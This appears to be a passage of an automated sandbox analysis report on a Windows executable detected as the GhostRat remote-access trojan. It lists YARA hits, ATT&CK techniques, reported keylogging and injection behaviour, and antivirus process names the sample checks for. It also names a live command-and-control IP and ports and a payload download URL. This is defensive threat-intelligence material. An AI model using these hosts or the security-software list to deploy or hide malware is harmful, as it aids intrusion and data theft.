                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10016BF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_10016BF4
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03635D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_03635D22
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03626A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,5_2_03626A70
                              Source: HGwpjJUqhW.exeBinary or memory string: acs.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: vsserv.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: kxetray.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: avcenter.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: KSafeTray.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: cfp.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: avp.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: 360Safe.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: rtvscan.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: 360tray.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: ashDisp.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: TMBMSRV.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: 360Tray.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: avgwdsvc.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: AYAgent.aye
                              Source: HGwpjJUqhW.exeBinary or memory string: RavMonD.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: QUHLPSVC.EXE
                              Source: HGwpjJUqhW.exeBinary or memory string: Mcshield.exe
                              Source: HGwpjJUqhW.exeBinary or memory string: K7TSecurity.exe

                              Stealing of Sensitive Information

                              barindex
                              Yara detected GhostRat
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3401004.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a64c83.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46c2c53.5.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a3301b.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46f486b.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a3b823.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.34a05bf.5.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3620000.6.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3620000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3401004.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a64c83.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.49505eb.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.34a05bf.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46f486b.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.49505eb.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46c2c53.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a3301b.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2927936986.0000000004651000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2927936986.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.4139867488.0000000004950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2927191607.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: HGwpjJUqhW.exe PID: 7652, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected GhostRat
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3401004.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a64c83.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46c2c53.5.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a3301b.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46f486b.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a3b823.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.34a05bf.5.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3620000.6.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3620000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.3401004.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a64c83.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.49505eb.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.34a05bf.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46f486b.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.HGwpjJUqhW.exe.49505eb.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.46c2c53.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.3.HGwpjJUqhW.exe.a3301b.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2927936986.0000000004651000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2927936986.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.4139867488.0000000004950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.2927191607.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: HGwpjJUqhW.exe PID: 7652, type: MEMORYSTR

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Replication Through Removable Media                              		1
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		121
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services11
                              Archive Collected Data                              		2
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter                              		Boot or Logon Initialization Scripts1
                              Access Token Manipulation                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory11
                              Peripheral Device Discovery                              		Remote Desktop Protocol1
                              Screen Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              PowerShell                              		Logon Script (Windows)222
                              Process Injection                              		2
                              Obfuscated Files or Information                              		Security Account Manager2
                              File and Directory Discovery                              		SMB/Windows Admin Shares121
                              Input Capture                              		1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                              Software Packing                              		NTDS26
                              System Information Discovery                              		Distributed Component Object Model2
                              Clipboard Data                              		2
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets1
                              Query Registry                              		SSHKeylogging13
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              Masquerading                              		Cached Domain Credentials41
                              Security Software Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Modify Registry                              		DCSync31
                              Virtualization/Sandbox Evasion                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                              Virtualization/Sandbox Evasion                              		Proc Filesystem3
                              Process Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Access Token Manipulation                              		/etc/passwd and /etc/shadow1
                              Application Window Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                              Process Injection                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                              Indicator Removal                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584088 Sample: HGwpjJUqhW.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 59 bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com 2->59 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 7 other signatures 2->71 9 HGwpjJUqhW.exe 21 2->9         started        signatures3 process4 dnsIp5 61 118.107.44.219, 18852, 19091, 19092 BCPL-SGBGPNETGlobalASNSG Singapore 9->61 63 bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com 47.79.48.211, 443, 49735 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 9->63 51 C:\Users\user\AppData\...\HGwpjJUqhW.exe, PE32 9->51 dropped 53 C:\Users\...\HGwpjJUqhW.exe:Zone.Identifier, ASCII 9->53 dropped 55 C:\Users\...\pc_yyb_2700200680_installer.exe, PE32+ 9->55 dropped 57 C:\...\pc_yyb_2700200680_installer[1].exe, PE32+ 9->57 dropped 75 Detected unpacking (overwrites its own PE header) 9->75 77 Adds a directory exclusion to Windows Defender 9->77 14 HGwpjJUqhW.exe 3 4 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 cmd.exe 1 9->21         started        file6 signatures7 process8 signatures9 81 Contains functionality to inject threads in other processes 14->81 83 Contains functionality to capture and log keystrokes 14->83 85 Contains functionality to inject code into remote processes 14->85 23 cmd.exe 14->23         started        25 cmd.exe 14->25         started        87 Bypasses PowerShell execution policy 17->87 89 Adds a directory exclusion to Windows Defender 17->89 27 powershell.exe 23 17->27         started        30 conhost.exe 17->30         started        32 powershell.exe 1 23 19->32         started        34 conhost.exe 19->34         started        36 powershell.exe 39 21->36         started        38 conhost.exe 21->38         started        process10 signatures11 40 powershell.exe 23->40         started        43 conhost.exe 23->43         started        45 conhost.exe 25->45         started        47 powershell.exe 25->47         started        79 Loading BitLocker PowerShell Module 27->79 49 WmiPrvSE.exe 27->49         started        process12 signatures13 73 Loading BitLocker PowerShell Module 40->73

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              HGwpjJUqhW.exe12%VirustotalBrowse
                              HGwpjJUqhW.exe8%ReversingLabs

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe8%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://yybadaccess.sparta.html5.qq.com/upload/callback_log?remote_path=0%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe/l0%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exef20%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe0%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/0%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_27R0%Avira URL Cloudsafe
                              https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policy0%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe;0%Avira URL Cloudsafe
                              https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recall0%Avira URL Cloudsafe
                              https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policyhttps://yybadaccess.3g.qq.0%Avira URL Cloudsafe
                              https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recallhttps://yybadaccess.3g.qq.com/pcyybope0%Avira URL Cloudsafe
                              http://www.microsoft.q0%Avira URL Cloudsafe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/;%0%Avira URL Cloudsafe
                              https://support.qq.com/product/0%Avira URL Cloudsafe
                              118.107.44.219:190910%Avira URL Cloudsafe
                              http://crl.microo0%Avira URL Cloudsafe
                              https://txc.qq.com/static/desktop/img/products/def-product-logo.png0%Avira URL Cloudsafe
                              https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_updatehttps://yybadaccess.3g.qq.com/v3/pcyyb0%Avira URL Cloudsafe
                              118.107.44.219:190920%Avira URL Cloudsafe
                              https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_update0%Avira URL Cloudsafe
                              http://crl.microl0%Avira URL Cloudsafe
                              https://ion=v4.50%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                              		47.79.48.211
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                118.107.44.219:19092true
                                • Avira URL Cloud: safe
                                		unknown
                                118.107.44.219:19091true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exef2HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0HGwpjJUqhW.exefalse
                                  		high
                                  http://ocsp.sectigo.com0HGwpjJUqhW.exefalse
                                    		high
                                    https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policyhttps://yybadaccess.3g.qq.pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.microsoft.copowershell.exe, 00000008.00000002.1751816167.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe;HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policypc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#HGwpjJUqhW.exefalse
                                          		high
                                          https://yybadaccess.sparta.html5.qq.com/upload/callback_log?remote_path=pc_yyb_2700200680_installer[1].exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe/lHGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.openssl.org/support/faq.html.pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                            		high
                                            http://www.openssl.org/support/faq.htmlpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                              		high
                                              https://curl.se/docs/hsts.htmlpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                		high
                                                https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1712398969.0000000004431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.0000000004671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013489390.000000000463A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013489390.0000000004626000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://yybadaccess.3g.qq.com/pc_yyb_client/pcyyb_get_app_detailwmpf_dataAndrows.exeABoxHeadless.exepc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                    		high
                                                    https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_27RHGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1717507853.000000000549B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1767043367.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1800870184.00000000056DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://yybadaccess.3g.qq.com/v3/pcyyb_client_updatepc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                          		high
                                                          https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recallpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_updatehttps://yybadaccess.3g.qq.com/v3/pcyybpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_updatepc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://yybadaccess.3g.qq.com/pc_yyb/pcyyb_get_downloader_policypc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                            		high
                                                            http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=F9S8-ZvivQQpcIjryW3M07yMoqKIlO5q&authKey=7DTLBVVH1YWYIIU%2pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                              		high
                                                              https://txc.qq.com/static/desktop/img/products/def-product-logo.pngpc_yyb_2700200680_installer[1].exe.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1712398969.0000000004431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.0000000004671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.000000000534F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013489390.0000000004656000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://yybadaccess.3g.qq.com/upload/callback_log?remote_path=pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                  		high
                                                                  https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/;%HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://support.qq.com/product/pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1717507853.000000000549B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1767043367.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1800870184.00000000056DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
